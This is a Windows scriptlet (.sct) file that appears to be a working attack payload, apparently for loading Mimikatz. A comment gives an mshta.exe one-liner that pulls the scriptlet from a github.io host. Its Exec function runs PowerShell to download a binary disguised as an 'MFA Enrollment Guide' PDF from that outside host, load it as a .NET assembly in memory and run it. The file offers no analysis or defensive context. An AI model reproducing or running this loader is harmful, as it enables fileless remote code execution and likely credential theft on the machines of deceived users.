<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("script:https://hakkyahud.github.io/Loadmimi.sct")).Exec();close(); -->

<registration
    description="Yahud"
    progid="Yahud"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("Powershell -NoExit -command $bytes=(New-Object Net.WebClient).DownloadData('https://hakkyahud.github.io/MFA_Enrollment_Guide_for_users.pdf');$assembly=[System.Reflection.Assembly]::Load($bytes);$entryPoint=$assembly.EntryPoint; $entryPoint.Invoke($null,$null)");
	}

]]>
</script>

</scriptlet>
